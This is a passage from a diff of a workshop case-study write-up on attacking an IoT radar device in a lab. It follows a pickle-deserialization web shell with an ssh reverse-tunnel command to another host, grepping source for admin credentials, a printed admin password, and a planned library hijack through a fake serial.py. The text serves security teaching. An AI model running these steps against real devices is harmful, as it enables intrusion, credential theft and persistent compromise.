LiuYuancheng/IT_OT_IoT_Cyber_Security_Workshop/IoT_System_Attack_Case_Study/IoT_Attack_Case_Study_02/IoT_Attack_Case_Study_02.md

 print ("Received reply: \n %s" %str(reqDict))
 ```

-After run the sender to send the web shell pickle bomb as data string to the IoT , we open URL: http://172.23.155.209:5001/ and the attack web shell show up, the we have successful activated the bomb and compromized the IoT device.
+After running the sender program to send the web shell pickle bomb as a data string to the IoT device, we can open the URL: `http://172.23.155.209:5001/`.
+The attack web shell appears as shown below, indicating that we have successfully activated the bomb and compromised the IoT device.

-Now let's try some command to cd to the IoT firmware page to list the file :
+Now, let's try some commands to navigate to the IoT firmware folder and list the files information:

 ![](img/s_14.png)

-Now our deserialization attack got success.
+The deserialization attack was successful.

 #### Bypass IoT Authorization and Implement Local File Hijacking Attack

-Now we have successful to run command on the IoT device, can we create a reverse shell on the IoT or SCP file in to it ? we try the reverse shell command first:
+Having successfully executed commands on the IoT device, the next step the attacker want to try is to create a reverse shell or transfer files using SCP.
+Let's first attempt the reverse shell command:

 ```
 ssh -R 0.0.0.0:7070:localhost:22 172.23.155.1
 ```

-We found that the ssh client is not installed, the error is shown below so we can not use reverse shell and SCP to transfer file to the IoT device:
+However, we find that the SSH client is not installed, as shown by the error message below.
+This means we cannot use a reverse shell or SCP to transfer files to the IoT device:

 ![](img/s_17.png)

-Can we use command to change the firmware to implement the attack?
-Based on the file permission config as shown below, only the config file is allowed to write, all the firmware file are only allow read and execute:
+Then the attacker want to try whether he can use command-line commands to modify the firmware for the attack.
+Based on the file permission configuration shown below, only the configuration file is writable; all firmware files are read-only and executable:

 ![](img/s_16.png)

-Based on the 2nd vulnerability, the attacker try to search some data related to the string "admin" with the cmd
+Based on the second vulnerability, the attacker searches for data related to the string "admin" using the command:

 ```
 grep "admin" Xandar_Sensor_Web/src/*
 ```

-Then we can find there is one json file named users.json contents the "admin" but without the password:
+This reveals a JSON file named `users.json` that contains the "admin" username as shown below :

 ![](img/s_15.png)

-Now we can cate the `Xandar_Sensor_Web/src/users.json` file:
+By viewing the contents of the `Xandar_Sensor_Web/src/users.json` file:

 ![](img/s_18.png)

-Now we can find the long password of the admin user:
+The attacker finds the long password for the "admin" user:

 ```
 7kylHS@n3pEGgS$M&HYJmRf4A!a*xfdZADAG^HWDYx#tSBkjcW
 ```

-Then we can login the IoT admin page:
+Using this password, the attacker can log in to the IoT admin page:

 ![](img/s_19.png)

-And view the radar detection result, manage the radar user and the data fetch from the radar, but how to the admin can also reset the settings and we can not change the firmware, is there a way to permanently compromised the IoT device?
+From here, we can view the radar detection results, manage radar users, and fetch data from the radar (as shown below).

 ![](img/s_20.png)

+However, while we cannot modify the firmware, the admin can fix the attack by reset IoT settings.
+Is there a way to permanently compromise the IoT device?

-The attack go thought all the pages, finally he find a place which can upload text format config file, but the file name must be Config_xxx.txt
+Exploring all the pages, the attacker finally finds a place to upload text format configuration files from web UI to IoT storage, with the file name required to be `Config_xxx.txt`:

 ![](img/s_21.png)

-He cat the radar serial communication firmware module  find it use python serial to read the data from the people detection radar:
+By examining the radar serial communication firmware module, it is found that it uses the Python serial library to read data from the people detection radar:

 ![](img/s_22.png)

-and it init the serial communication with this code:
+The serial communication is initialized with this code:

 ```
 self.serComm = serial.Serial(self.serialPort, 115200, 8, 'N', 1, timeout=1)
 ```

-Then use the read() function to read data from the radar,

-Now the hacker can do the local Local File Hijacking to replace the serial lib, the hacker make a serial.py file with below contents:
+The `Serial.read()` function is used to read data from the radar.
+Then the attacker then creates a fake serial library for a local file hijacking attack.
+The `serial.py` file contains the following contents:

 ```
 from struct import pack